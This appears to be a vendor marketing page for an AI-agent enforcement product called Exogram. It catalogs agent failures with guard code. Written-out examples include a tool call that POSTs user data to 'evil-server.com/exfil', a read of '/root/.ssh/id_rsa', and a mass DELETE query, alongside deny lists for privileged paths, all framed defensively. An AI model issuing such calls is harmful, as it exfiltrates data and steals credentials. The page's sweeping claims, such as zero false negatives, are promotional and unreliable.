AI Fails Silently. Here Is Every Way.

A catalog of real, reproducible agent failures and how deterministic enforcement stops them.

Prompt engineering is not a security perimeter.

These failures are actively occurring in unprotected production systems today.
Zero Trust For AI

The Anatomy of a Silent Failure

AI without an execution boundary is like a production database without authentication. A single hallucination cascades into systemic data loss.

Step 1: Hallucination
  ↓ EXOGRAM BLOCKS HERE
Step 2: Wrong Parameter
Step 3: Unauthorized Action
Step 4: Data Loss
Actively observed in production systems:
CRM Automation Pipelines | Financial Transaction Handlers | Internal Data Tooling | Customer Support Agents
Common Failure Class

Case 1: The Schema Hallucination

The model tries to be helpful and invents parameters that crash downstream databases.

Probabilistic Output
{
  "name": "Alice",
  "age": 30,
  "inferred_income": "$100k"
}
The Threat: Database rejects the unmapped inferred_income column. Pipeline crashes silently. No error reaches the user.
Exogram Enforcement
🛑 BLOCKED (0.07ms)
SchemaError: Field 'inferred_income' is strictly prohibited by the schema definition.
Precise error trace returned to the client for automated recovery. No guessing.
Risk: High | Exogram Protection: Native
Replay this failure in Proving Ground
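A minimal sketch of the kind of strict-schema gate this case implies. Exogram's actual API is not shown on this page, so every name here (enforce_schema, ALLOWED_FIELDS, SchemaError) is hypothetical; the point is that unknown fields fail loudly instead of crashing a downstream pipeline silently.

```python
# Hypothetical strict schema: declared fields and their expected types.
ALLOWED_FIELDS = {"name": str, "age": int}

class SchemaError(Exception):
    """Raised with a precise trace instead of letting bad data reach the database."""

def enforce_schema(payload: dict) -> dict:
    # Reject any field the schema does not declare -- no silent passthrough.
    for field in payload:
        if field not in ALLOWED_FIELDS:
            raise SchemaError(
                f"Field '{field}' is strictly prohibited by the schema definition."
            )
    # Reject declared fields carrying the wrong type.
    for field, expected in ALLOWED_FIELDS.items():
        if field in payload and not isinstance(payload[field], expected):
            raise SchemaError(f"Field '{field}' must be of type {expected.__name__}.")
    return payload
```

The check is pure and deterministic: the same payload produces the same verdict every time, which is what makes automated recovery possible.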
Common Failure Class

Case 2: Context Collapse — Destructive Mutation

The agent forgets its environmental constraints and attempts a mass deletion on production data.

Probabilistic Output
{
  "tool": "sql_compute",
  "query": "DELETE FROM users WHERE status = 'inactive';"
}
The Threat: Query intended for test environment executed on production cluster. Catastrophic, irrecoverable data loss.
Exogram Enforcement
🛑 BLOCKED (0.07ms)
SecurityViolation: Mass deletion without explicit user IDs is prohibited on the production cluster.
Precise error trace returned to the client for automated recovery. No guessing.
Risk: High | Exogram Protection: Native
Replay this failure in Proving Ground
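The mass-deletion guard could be sketched as a deterministic predicate over the query text and target environment. This is an illustration, not Exogram's implementation: the function name, the environment label, and the "explicit IDs" heuristic (requiring an `id IN (...)` predicate) are all assumptions for the sketch.

```python
import re

class SecurityViolation(Exception):
    """Raised before the query ever reaches the production cluster."""

def enforce_sql(query: str, environment: str) -> str:
    # Collapse whitespace so multi-line queries normalize to one form.
    normalized = " ".join(query.split()).lower()
    if environment == "production" and normalized.startswith("delete"):
        # Broad filters like status = 'inactive' do not count as explicit IDs;
        # require a primary-key predicate of the form "WHERE id IN (...)".
        if not re.search(r"\bwhere\b.*\bid\s+in\s*\(", normalized):
            raise SecurityViolation(
                "Mass deletion without explicit user IDs is prohibited "
                "on the production cluster."
            )
    return query
```

Because the gate inspects the literal query rather than trusting the model's stated intent, a query "meant for test" is caught the moment it targets production.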
Common Failure Class

Case 3: The Infinite Tool Loop

The model repeatedly calls an API with failing parameters, burning tokens and triggering rate limits.

Probabilistic Output
> Call: fetch_pricing(auth=null)
> Error: 401 Unauthorized
> Call: fetch_pricing(auth=null)
> Error: 401 Unauthorized
> Call: fetch_pricing(auth=null)
...
The Threat: The model cannot recognize its own failure pattern. Orchestrators lack hard circuit breakers. Token spend spirals.
Exogram Enforcement
🛑 CIRCUIT BROKEN (0.07ms)
RateLimitViolation: Tool 'fetch_pricing' called 5 times in 2000ms with identical failing parameters.
Precise error trace returned to the client for automated recovery. No guessing.
Risk: High | Exogram Protection: Native
Replay this failure in Proving Ground
Common Failure Class

Case 4: Data Exfiltration via API Call

The agent constructs an outbound API call to an untrusted domain, uploading user data.

Probabilistic Output
{
  "tool": "http_request",
  "method": "POST",
  "url": "https://evil-server.com/exfil",
  "body": "user_data=..."
}
The Threat: Stolen PII, credentials, or proprietary data POSTed to an attacker-controlled server. No audit trail.
Exogram Enforcement
🛑 BLOCKED (0.07ms)
ExfiltrationGuard: Outbound API call to untrusted domain 'evil-server.com' is prohibited.
Precise error trace returned to the client for automated recovery. No guessing.
Risk: High | Exogram Protection: Native
Replay this failure in Proving Ground
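An exfiltration gate of this shape reduces to a domain allowlist checked before any outbound request leaves the boundary. The allowlist contents and function name below are invented for illustration; the deny-by-default stance is the part that matters.

```python
from urllib.parse import urlparse

# Hypothetical allowlist: anything not explicitly trusted is denied.
TRUSTED_DOMAINS = {"api.internal.example.com"}

class ExfiltrationGuard(Exception):
    """Raised before the request body (and any PII in it) leaves the boundary."""

def enforce_outbound(url: str) -> str:
    host = urlparse(url).hostname or ""
    if host not in TRUSTED_DOMAINS:
        raise ExfiltrationGuard(
            f"Outbound API call to untrusted domain '{host}' is prohibited."
        )
    return url
```

Parsing the hostname (rather than substring-matching the URL) avoids trivial bypasses like `https://api.internal.example.com.evil-server.com/`.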
Common Failure Class

Case 5: Privilege Escalation via Filesystem

The agent attempts to read SSH keys, /etc/passwd, or system configuration files.

Probabilistic Output
{
  "tool": "file_read",
  "path": "/root/.ssh/id_rsa"
}
The Threat: Credential theft enables lateral movement. The agent gains access beyond its intended scope.
Exogram Enforcement
🛑 BLOCKED (0.07ms)
FilesystemGuard: Access to /root/.ssh/ is strictly prohibited. Privileged paths are blocked.
Precise error trace returned to the client for automated recovery. No guessing.
Risk: High | Exogram Protection: Native
Replay this failure in Proving Ground
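A filesystem gate for this case can be sketched as path normalization followed by a privileged-prefix deny list. The prefixes and names below are assumptions for the sketch; normalizing first is what defeats `..` traversal tricks.

```python
import posixpath

# Hypothetical deny list of privileged path prefixes.
BLOCKED_PREFIXES = ("/root/", "/etc/")

class FilesystemGuard(Exception):
    """Raised before the read happens; no credential ever leaves the sandbox."""

def enforce_path(path: str) -> str:
    # Normalize first so "/var/../etc/passwd" is judged as "/etc/passwd".
    normalized = posixpath.normpath(path)
    for prefix in BLOCKED_PREFIXES:
        if normalized == prefix.rstrip("/") or normalized.startswith(prefix):
            raise FilesystemGuard(
                f"Access to {prefix} is strictly prohibited. "
                "Privileged paths are blocked."
            )
    return normalized
```

In a real deployment an allowlist of permitted directories is stronger than a deny list, since it fails closed for paths nobody thought to block.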

The Pattern

Every failure shares the same root cause: the execution layer trusts the probabilistic output. Prompt engineering is a suggestion. System prompts are a suggestion. Tool descriptions are a suggestion. None of them are enforceable contracts.

Exogram replaces suggestions with deterministic logic gates — Python code that evaluates in 0.07ms, produces the same result every time, and returns precise error traces for automated recovery.
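The gate-chain idea can be sketched in a few lines: every tool call passes through an ordered list of deterministic checks, and the first violation halts execution with a typed error. The gates below are hypothetical stand-ins, not Exogram's rule set.

```python
def evaluate(call: dict, gates: list) -> dict:
    """Run each gate in order; a gate raises a typed error on violation,
    otherwise it is a no-op. Same call in, same verdict out -- every time."""
    for gate in gates:
        gate(call)
    return call

# Two illustrative gates (hypothetical rules):
def no_extra_fields(call: dict) -> None:
    extra = set(call) - {"tool", "args"}
    if extra:
        raise ValueError(f"Unexpected fields: {sorted(extra)}")

def tool_allowlisted(call: dict) -> None:
    if call["tool"] not in {"sql_compute", "http_request", "file_read"}:
        raise ValueError(f"Tool '{call['tool']}' is not allowlisted.")
```

Because each gate is a pure function of the call, the chain composes: adding a policy rule means appending a gate, and the error trace always names the exact rule that fired.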

0.07ms
Evaluation Time
0
False Negatives
8
Policy Rules
134 RPS
Production Throughput